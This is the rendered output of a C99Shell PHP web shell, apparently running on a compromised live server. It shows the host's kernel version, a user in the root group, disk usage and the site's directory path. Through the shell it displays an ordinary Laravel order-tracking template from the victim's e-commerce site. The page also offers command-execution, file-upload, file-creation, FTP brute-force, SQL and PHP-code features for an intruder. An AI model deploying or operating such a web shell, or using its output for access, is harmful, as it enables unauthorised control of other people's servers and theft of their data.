!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/site/order/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     order-track-details.blade.php (3.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('../site/layouts.app')

@section('page_title', __('Order Track'))
@section('content')
<div class="mx-4 lg:mx-4 xl:mx-32 2xl:mx-64 3xl:mx-92">
    <div class="pt-38p">
        <p class="text-gray-12 text-18 roboto-medium"><span>{{ __('Order Reference') }}</span></p>
        <span class="primary-text-color dm-bold text-32">{{ $order->reference }}</span>
        @guest
            <p>{!! __('For more details, :x', ['x' => '<a href="javascript:void(0)" class="underline font-bold open-login-modal">' . __('please login to your account.') . '</a>']) !!}</p>
        @endguest
    </div>
    <div class="grid grid-cols-2 gap-4 sm:flex sm:flex-wrap mt-30p">
        <div class="md:pr-38p md:border-r">
            <span class="text-gray-10 text-13 roboto-medium">{{ __('ORDER DATE') }}</span>
            <p class="text-gray-12 text-18 dm-sans mt-5p">{{ $order->order_date }}</p>
        </div>
        <div class="sm:pr-11 sm:pl-29p md:border-r">
            <span class="text-gray-10 text-13 roboto-medium">{{ __('STATUS') }}</span>
            <p class="text-gray-12 text-18 dm-sans mt-5p">{{ optional($order->orderStatus)->name }}</p>
        </div>
        <div class="sm:pr-11 sm:pl-29p md:border-r">
            <span class="text-gray-10 text-13 roboto-medium">{{ __('PAYMENT STATUS') }}</span>
            <p class="text-gray-12 text-18 dm-sans mt-5p">{{ $order->payment_status }}</p>
        </div>
        <div class="md:pr-11 md:pl-29p pr-29p pl-0">
            <span class="text-gray-10 text-13 roboto-medium">{{ __('TOTAL') }}</span>
            <p class="text-gray-12 text-18 dm-sans mt-5p">{{ formatNumber($order->total) }}</p>
        </div>
    </div>
    <div class="mt-58p">
        <p class="text-gray-12 dm-bold lg:text-20 text-13">{{ __('ORDER DETAILS') }}</p>
    </div>
    <div class="flex flex-col border border-gray-2 px-29p w-full pt-4 pb-5 rounded mt-8 mb-60p">
        <p class="mb-13p mt-1p"><span class="dm-sans text-gray-12 text-base">{{ __('Products') }}</span></p>
        <div class="w-full border-b border-gray-2"></div>
        @foreach ($order->orderDetails as $item)
            @php
                $vendor = $item->vendor;
                if (is_null($item->parent_id)) {
                    $product = $item->product;
                } else {
                    $product = $item->parentProduct;
                }
            @endphp
            <div class="flex flex-row justify-between mt-19p">
                <div class="flex flex-col">
                    <p class="dm-sans text-gray-12 text-sm">
                        @if (optional($product)->slug)
                            <a href="{{ route('site.productDetails', ['slug' => $product->slug]) }}">{{ $item->product_name }}</a>
                        @else
                            <span>{{ $item->product_name }}</span>
                        @endif
                        <span class="px-4">x</span>
                        <span>{{ (int) $item->quantity }}</span>
                    </p>
                    <p class="text-gray-10 roboto-medium text-xs mt-3p">
                        @if (!is_null(optional($vendor)->name))
                            <span>{{ __('Vendor') }}</span>
                            <span class="px-1">:</span>
                            <a href="{{ route('site.shop', ['alias' => $vendor->shops->first()->alias]) }}" class="text-gray-600">{{ $vendor->name }}</a>
                        @endif
                    </p>
                </div>
                <div class="right-side">
                    <span class="dm-sans text-gray-12 text-sm">{{ formatNumber($item->price * $item->quantity) }}</span>
                </div>
            </div>
        @endforeach
    </div>
</div>
@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--